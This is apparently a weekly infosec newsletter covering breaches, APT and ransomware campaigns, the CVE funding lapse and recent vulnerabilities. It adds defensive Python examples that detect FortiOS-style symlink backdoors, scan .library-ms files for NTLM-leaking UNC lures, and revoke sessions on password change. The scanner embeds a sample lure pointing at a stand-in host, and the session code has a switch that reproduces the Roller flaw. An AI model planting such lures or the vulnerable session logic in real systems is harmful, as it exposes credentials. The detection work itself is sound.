🕵🏻‍♂️ [InfoSec MASHUP] 16/2025
The European Commission is providing staff with burner phones and laptops for trips to the US; China is pursuing three alleged U.S. operatives for cyberattacks on its infrastructure; a whistleblower revealed that DOGE may have accessed sensitive labor data from the National Labor Relations Board (NLRB); a new ransomware called "DOGE BIG BALLS"; the U.S. government lets funding for the Common Vulnerabilities and Exposures (CVE) program run to the wire... then reverses course and extends MITRE's CVE contract.
We now have 1,654 subscribers! Thank you all for being part of my newsletter. Please share it with your friends and colleagues, and let's keep growing the community.
Let's now dive into this week's top insights!
BREACHES & SECURITY INCIDENTS
πΊπΈ A ransomware group claims to have stolen 2.5 terabytes of files from Oregon's Department of Environmental Quality (DEQ) after the agency denied a data breach. The hackers demand a ransom of 30 bitcoin, threatening to auction the stolen data if not paid. The DEQ continues to investigate but has not confirmed a data breach in recent updates.
🇳🇱 🇺🇸 Ahold Delhaize has confirmed that data was stolen during a cyberattack on its U.S. business systems in November 2024. The company is investigating the breach and will notify customers if their personal data was affected. Despite the incident, all stores and online services remain operational.
🇺🇸 Insurance firm Lemonade revealed that a technical glitch exposed the driver's license numbers of about 190,000 individuals. Between April 2023 and September 2024 the numbers were transmitted without encryption. Lemonade is offering free credit monitoring to those affected and states that there is no evidence of misuse of the data.
🇺🇸 DaVita, a kidney dialysis services provider, experienced a ransomware attack that disrupted some of its operations. The company activated response measures and is working with cybersecurity experts to address the situation. It has not disclosed details about the attackers or any potential data theft.
🇺🇸 Conduent reported a cyberattack in January that resulted in the theft of personal information, including names and Social Security numbers, from some clients. The company restored its systems quickly and confirmed that the stolen data has not been publicly released. Conduent is working with affected clients to address the situation and ensure compliance with legal notifications.
🇺🇸 Over 2.6 million people were affected by data breaches at Landmark Admin and Young Consulting. Landmark Admin reported a ransomware attack that compromised sensitive personal information of about 1.6 million individuals. Young Consulting also increased its estimate of affected individuals to over 1 million after a breach in April 2024.
(Infamous Internet imageboard and wretched hive of scum and villainy) 4chan has been down since Monday night (Apr. 14, 2025) due to a hack that compromised its databases and user information. A rival site, Soyjak Party, claims to have carried out the attack, but the truth is unclear. Security experts noted that 4chan's outdated software likely made it vulnerable to this breach.
Hertz has informed customers about a data breach that involved personal information and driver's licenses, caused by a cyberattack on a vendor, Cleo Software. The stolen data affects customers in multiple countries and includes names, contact details and, in some cases, Social Security numbers. Hertz stated that while the breach was significant, it would be inaccurate to say millions of customers were impacted.
Partners and Affiliates
NordVPN Spring Campaign (March 19 to May 19)
With its user-friendly interface, robust security features, and commitment to privacy, NordVPN continues to be a popular choice for individuals seeking online protection and unrestricted internet access.
Special Offer: up to 77% off + 3 extra months on selected 2-year plans.
🥷🏻 CYBERCRIME, CYBER ESPIONAGE, APTs
🇨🇳 🇺🇸 The Chinese hacking group Mustang Panda has updated its tooling in recent attacks on government and military targets: a revised ToneShell backdoor, two new keyloggers (PAKLOG and CorKLOG) and a new traffic-proxy tool called StarProxy, all loaded through DLL sideloading to evade detection. This is the same group whose PlugX implant the U.S. Department of Justice removed from more than 4,000 U.S. computers in a court-authorized operation in January 2025.
🇨🇳 🇺🇸 Chinese police in Harbin have named three alleged NSA operatives as responsible for cyberattacks on Chinese infrastructure during the Asian Winter Games in February 2025. The attacks reportedly targeted systems supporting the Games as well as critical infrastructure and personal data. China has urged the U.S. to stop these cyberattacks.
Swiss cybersecurity firm Prodaft is buying verified accounts on hacking forums to monitor cybercriminals. They aim to gather intelligence on illegal activities and improve their threat detection methods. The company offers payments in cryptocurrency and keeps the process anonymous while reporting purchases to law enforcement.
{Cyber,Info}Sec Events: My list of past and future {cyber,info}sec related events. Feel free to contribute by submitting issues or pull requests. Thanks!
👨🏻‍⚖️ GOVERNMENT, POLITICS, AND PRIVACY
Chris Krebs has resigned from his role at SentinelOne after his security clearance was revoked following a presidential order. He stated that the decision to leave was his own and that he intends to focus on fighting for democracy and free speech outside of the company. The White House is reviewing his past actions at CISA to determine if there were any violations of conduct standards.
🇨🇳 🇺🇸 A Maryland man, Minh Phuong Ngoc Vong, admitted in court to fraudulently securing remote IT jobs with US companies for individuals in China. He provided false credentials and allowed foreign nationals to access sensitive US government systems while he received payment for their work. Vong pleaded guilty to wire fraud conspiracy and could face up to 20 years in prison.
🇪🇺 🇺🇸 The European Commission is providing staff with burner phones and laptops for trips to the US to prevent espionage. This measure, usually reserved for visits to countries like China and Russia, reflects growing concern about cyber threats from the US. Relations between the EU and the US have deteriorated, prompting heightened caution among European officials.
🇺🇸 A whistleblower revealed that DOGE may have accessed sensitive labor data from the National Labor Relations Board (NLRB), raising concerns about potential misuse. DOGE staff reportedly attempted to conceal their activities, and NLRB staff were alarmed by suspicious logins from Russia. Experts worry that leaked data could harm unions and ongoing legal cases, and there are calls for further investigations into DOGE's practices.
Partners and Affiliates

Stay connected and secure on the go with Airalo's global eSIMs. Use the code NEWTOAIRALO15 if you're new to Airalo to get an additional 15% discount.
MALWARE & THREATS
🇨🇳 Chinese hackers known as UNC5174 are targeting Linux systems using a new malware called SNOWLIGHT and an open-source tool named VShell. These tools allow attackers to gain remote access and control over infected systems, making it hard to trace their activities. The campaign has been linked to various cyber attacks across multiple countries and sectors.
Over 16,000 Fortinet devices have been compromised with a symlink backdoor that gives attackers read access to sensitive files. Attackers who had exploited older FortiOS vulnerabilities left behind a symbolic link in a folder used to serve SSL-VPN language files, pointing into the root filesystem. Because the link lives in the user filesystem, it survived patching of the original holes and kept read-only access to the device open. Fortinet has notified affected customers, and the latest FortiOS releases remove the link and stop the SSL-VPN from serving it; if you only patched the original CVEs, check whether the symlink persisted.
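The persistence trick above is a generic one: a symlink planted inside a served directory that resolves outside it. The check below is an added example, not Fortinet's own tooling or advisory script; it walks any directory tree you can mount (an extracted firmware image, a backup, a web root) and reports every symlink whose target escapes that tree. The sample tree it builds is constructed inline to mimic the pattern (a language-file folder with one benign relative link and one link to `/`).

```python
"""Flag symlinks under a served directory that resolve outside it.

Added example modelling the FortiOS symlink backdoor pattern as a generic
filesystem check. Directory and file names below are constructed for the demo.
"""
import os
import tempfile
from pathlib import Path


def find_escaping_symlinks(served_root: str) -> list[tuple[str, str]]:
    """Return (link_path, resolved_target) for every symlink beneath
    served_root whose target resolves outside served_root."""
    root = Path(served_root).resolve()
    findings = []
    # followlinks=False: never descend through a planted link to the root fs
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:   # dir symlinks show up in dirnames
            p = Path(dirpath) / name
            if not p.is_symlink():
                continue
            target = Path(os.path.realpath(p))  # also resolves dangling links
            try:
                target.relative_to(root)        # raises when outside the tree
            except ValueError:
                findings.append((str(p), str(target)))
    return findings


def build_demo_tree() -> str:
    """Constructed sample: a 'lang' folder with one legitimate relative
    symlink and one planted link to the filesystem root."""
    base = tempfile.mkdtemp(prefix="sslvpn-lang-")
    lang = Path(base) / "lang"
    lang.mkdir()
    (lang / "en.json").write_text("{}")
    os.symlink("en.json", lang / "default.json")   # benign, stays inside
    os.symlink("/", lang / "xx.json")               # the backdoor pattern
    return base


if __name__ == "__main__":
    for link, target in find_escaping_symlinks(build_demo_tree()):
        print(f"SUSPICIOUS {link} -> {target}")
```

Run it against a mounted image rather than a live appliance; on a live device the same link would be served to anyone who asks for the right language file, which is exactly why the vendor fix both removes the link and stops the SSL-VPN from serving it.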
Microsoft reports that since October 2024, threat actors have been using Node.js to deliver malware and steal information. They rely on malvertising campaigns, often disguising malicious installers as legitimate software, to trick users into downloading harmful files. Organizations are advised to educate users and implement security measures to mitigate these evolving threats.
IBM X-Force has reported that the cyber crime group Hive0148 is targeting users in Mexico and Costa Rica with phishing campaigns to spread the Grandoreiro banking trojan. This malware is designed to steal banking credentials and has been linked to significant financial fraud. Victims receive emails posing as government communications, tricking them into downloading malicious files.
A new ransomware called "DOGE BIG BALLS", a customized build of the Fog ransomware, uses a deceptive ZIP file and PowerShell scripts to silently infect computers and encrypt files. It collects detailed system information and employs tactics to mislead victims, including naming a real public figure in its ransom notes. The attack chain shows advanced techniques for gaining access and evading detection.

Figure: Infection chain (source: cyble.com)
A new malware called ResolverRAT is targeting healthcare and pharmaceutical organizations, employing advanced techniques to evade detection. It spreads through phishing emails that use fear-based lures to trick employees into downloading malicious files. ResolverRAT is sophisticated, with features that allow it to maintain persistence and communicate stealthily with its command-and-control servers.
🧰 AI, CRYPTO, TECH & TOOLS
🇪🇺 Meta will start training its AI models using public data from users in the European Union after getting approval from regulators. This training aims to help the AI better understand European cultures, languages, and history. Users will receive notifications about this data use and can opt out if they choose.
Partners and Affiliates
⚡ Unlock Your Peak Performance: First Month FREE!
Optimize your sleep, recovery, and performance with WHOOP. Perfect for cybersecurity pros who need to stay focused and ahead of the threat. Try it out, get a free WHOOP 4.0 and one month free.
VULNERABILITIES, RESEARCH, AND THREAT INTELLIGENCE
From the Patching Department:
🇺🇸 U.S. government funding for MITRE's operation of the Common Vulnerabilities and Exposures (CVE) program, which assigns the identifiers the whole industry uses to track security flaws, was due to expire on April 16, 2025. A lapse would have meant no new CVE IDs could be assigned and vulnerability management across vendors, scanners and advisories would have lost its common reference, with knock-on risks to national security. Experts warned that without intervention from the security industry, tracking vulnerabilities could become chaotic. Hours before the deadline, CISA exercised an option to extend MITRE's contract, keeping the program running for now.

Figure: Letter sent by the Director of the Center for Securing the Homeland (CSH), to CVE board members announcing the expiration of the program.
Adam Shostack's take on the above
Brian Krebs' take on the above
NoVa govcon firm Mitre to lay off 442 employees after DOGE cuts contracts
April 16, 2025: The CVE Foundation:
The CVE Foundation has been formally established to ensure the long-term viability, stability, and independence of the Common Vulnerabilities and Exposures (CVE) Program, a critical pillar of the global cybersecurity infrastructure for 25 years.
April 16, 2025: GCVE: Global CVE Allocation System
The Global CVE (GCVE) allocation system is a new, decentralized approach to vulnerability identification and numbering, designed to improve flexibility, scalability, and autonomy for participating entities.
While remaining compatible with the traditional CVE system, GCVE introduces GCVE Numbering Authorities (GNAs). GNAs are independent entities that can allocate identifiers without relying on a centralised block distribution system or rigid policy enforcement.

A security flaw in Microsoft Windows, CVE-2025-24054, is actively being exploited to steal NTLM credentials. A malicious .library-ms file, delivered inside a ZIP or as a direct download, makes Windows Explorer connect to an attacker-controlled SMB share with minimal user interaction (viewing or extracting the archive is enough), leaking the user's NTLMv2 hash, which can then be cracked offline or relayed. Microsoft patched the bug in March 2025; CISA has added it to its Known Exploited Vulnerabilities catalog and requires federal agencies to patch by May 8, 2025.
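The lure in this campaign is an ordinary Windows Library Description file: XML whose `<simpleLocation><url>` element carries a UNC path, and Explorer reaches out to that host when it renders the file. The scanner below is an added example, not Microsoft's or CISA's code, for triaging `.library-ms` attachments in a mail quarantine or a Downloads folder: it parses the XML without trusting the namespace, pulls the host out of every UNC `<url>`, and reports hosts that are not on an internal range. The sample file is constructed inline (the namespace URI mirrors what Windows writes but is treated as an assumption here), the attacker host is the documentation address 203.0.113.5, and the trusted ranges and `.corp.local` suffix are assumptions you would replace with your own.

```python
"""Flag .library-ms files whose <url> entries point at remote UNC hosts.

Added example for the CVE-2025-24054 lure format. Sample XML, trusted
networks and the internal DNS suffix are constructed/assumed for the demo.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET

UNC_RE = re.compile(r"^\\\\([^\\]+)\\")   # \\host\share... -> host

# Assumed internal ranges: RFC 1918, loopback, link-local, ULA. Python's own
# is_private would also count documentation ranges, so we list ours explicitly.
TRUSTED_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed sample file: one entry pointing at an external host (the lure),
# one pointing at an internal file server.
SAMPLE_LIBRARY_MS = """<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\203.0.113.5\\share</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\fileserver.corp.local\\public</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def unc_hosts(library_xml: str) -> list[str]:
    """Host part of every UNC <url> in the file, in document order."""
    hosts = []
    for elem in ET.fromstring(library_xml).iter():
        # '{namespace}url' -> 'url'; we do not rely on the namespace URI
        if elem.tag.rsplit("}", 1)[-1] != "url" or not elem.text:
            continue
        m = UNC_RE.match(elem.text.strip())
        if m:
            hosts.append(m.group(1))
    return hosts


def is_remote_host(host: str, trusted_suffixes=(".corp.local",)) -> bool:
    """True when Windows should not be handing an NTLM handshake to this host:
    an address outside TRUSTED_NETS, or a name outside the assumed suffixes."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return not host.lower().endswith(trusted_suffixes)
    return not any(ip in net for net in TRUSTED_NETS)


def scan_library_ms(library_xml: str) -> list[str]:
    """Hosts in the file that should be treated as NTLM-leak attempts."""
    return [h for h in unc_hosts(library_xml) if is_remote_host(h)]


if __name__ == "__main__":
    for host in scan_library_ms(SAMPLE_LIBRARY_MS):
        print(f"NTLM leak lure -> {host}")
```

The same check also works as a network-side rule: outbound SMB (TCP 445) from workstations to non-internal hosts is the traffic this lure produces, and blocking it at the egress firewall closes this and the other "leak a hash via a UNC path" tricks at once.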
🩹 Apple has released updates to fix two serious security vulnerabilities (one in CoreAudio, one in the RPAC pointer-authentication mitigation) that Apple says may have been used in an extremely sophisticated attack against specific targeted individuals. Both can lead to code execution, the CoreAudio bug through a malicious media file. Apple credited its own team and Google's Threat Analysis Group for the discovery. The updates cover iPhones, iPads, macOS, Apple TV, and Vision Pro.
A serious vulnerability in Apache Roller (CVE-2025-24859), a Java-based blogging server, leaves existing sessions valid after a password change, whether the change is made by the user or by an administrator. An attacker who has obtained a session therefore keeps access even after the victim rotates the password. The flaw affects all versions up to 6.1.4 and carries the maximum CVSS score of 10.0. It has been fixed in version 6.1.5, which invalidates all active sessions when a password is changed.
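The Roller bug is a general design lesson: a session must be bound to the credential it was minted under, so rotating the credential kills the session. The example below is added here and is not Roller's code; it models the fix with a minimal in-memory session store in which each user carries a credential-generation counter, every session records the generation it was issued under, and a password change bumps the counter so all older sessions stop validating. The `rotate_on_password_change=False` switch reproduces the vulnerable behaviour for contrast. User names, passwords and the `h:` hash stand-in are constructed for the demo.

```python
"""Bind sessions to a credential generation so password changes revoke them.

Added example modelling the CVE-2025-24859 class of bug and its fix. The
password 'hash' is a stand-in; use argon2/bcrypt/scrypt in real code.
"""
import secrets
from dataclasses import dataclass, field


@dataclass
class User:
    username: str
    password_hash: str
    cred_generation: int = 0   # bumped on every password change


@dataclass
class SessionStore:
    rotate_on_password_change: bool = True  # False reproduces the Roller bug
    users: dict = field(default_factory=dict)
    sessions: dict = field(default_factory=dict)  # sid -> (username, generation)

    @staticmethod
    def _hash(password: str) -> str:
        return "h:" + password   # demo stand-in, not a real password hash

    def add_user(self, username: str, password: str) -> None:
        self.users[username] = User(username, self._hash(password))

    def login(self, username: str, password: str):
        """Return a new session id, or None on bad credentials."""
        user = self.users.get(username)
        if user is None or not secrets.compare_digest(
                user.password_hash, self._hash(password)):
            return None
        sid = secrets.token_urlsafe(32)
        self.sessions[sid] = (username, user.cred_generation)
        return sid

    def is_valid(self, sid: str) -> bool:
        """A session is live only if its generation matches the user's."""
        entry = self.sessions.get(sid)
        if entry is None:
            return False
        username, generation = entry
        user = self.users.get(username)
        return user is not None and generation == user.cred_generation

    def change_password(self, username: str, new_password: str) -> None:
        user = self.users[username]
        user.password_hash = self._hash(new_password)
        if self.rotate_on_password_change:
            # The fix: every session minted under the old credential dies.
            user.cred_generation += 1

    def logout(self, sid: str) -> None:
        self.sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    store.add_user("alice", "old-pass")
    sid = store.login("alice", "old-pass")
    store.change_password("alice", "new-pass")
    print("old session still valid after password change:", store.is_valid(sid))
```

The generation counter is the same idea frameworks such as Django use when they fold a hash of the password into the session; it also gives you a one-line "log out everywhere" by bumping the counter without touching the password.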
Ivanti has faced more exploited vulnerabilities in its network devices than any other vendor in the past 16 months, raising concerns about its security practices. While some experts criticize Ivanti for this, others commend its transparency and proactive approach to vulnerability management. The challenges Ivanti faces may reflect broader problems in the edge-device industry rather than being solely a problem with the company itself. [more at CyberScoop]
A threat actor is allegedly selling a zero-day exploit that targets FortiGate firewalls, claiming unauthenticated remote code execution. Fortinet recently released patches for known vulnerabilities, but attackers have maintained access to previously exploited devices. Users are urged to update their firewalls to fixed versions and to review devices for signs of earlier compromise.
🩹 Trend Micro has warned that Nvidia's patch for a critical container-escape vulnerability in the Nvidia Container Toolkit is incomplete, leaving systems exposed. A crafted container image can still break out to reach host resources, giving an attacker access to sensitive data or a way to disrupt operations in GPU-enabled environments. Organizations using the affected toolkit should limit who can supply container images, drop unnecessary privileges, and restrict access to the container runtime's API until a complete fix is available.
ICS, OT & IoT
Audio-enabled crosswalk buttons in Silicon Valley were hacked to play voices imitating Mark Zuckerberg and Elon Musk. The messages included humorous and unsettling AI-generated speech, raising concerns about privacy and security. Local officials are investigating the incident, which may be linked to hacktivism.

Figure: Crosswalk button
CONNECT
Follow me on Mastodon for quick daily updates and bite-sized content.
Prefer using an RSS feed? Add Infosec MASHUP to your feed here.
Thanks for reading today's newsletter, and if you're enjoying it and want to support my work, you can buy me a coffee ☕ over at https://www.buymeacoffee.com/0x58
See you next time!
-X.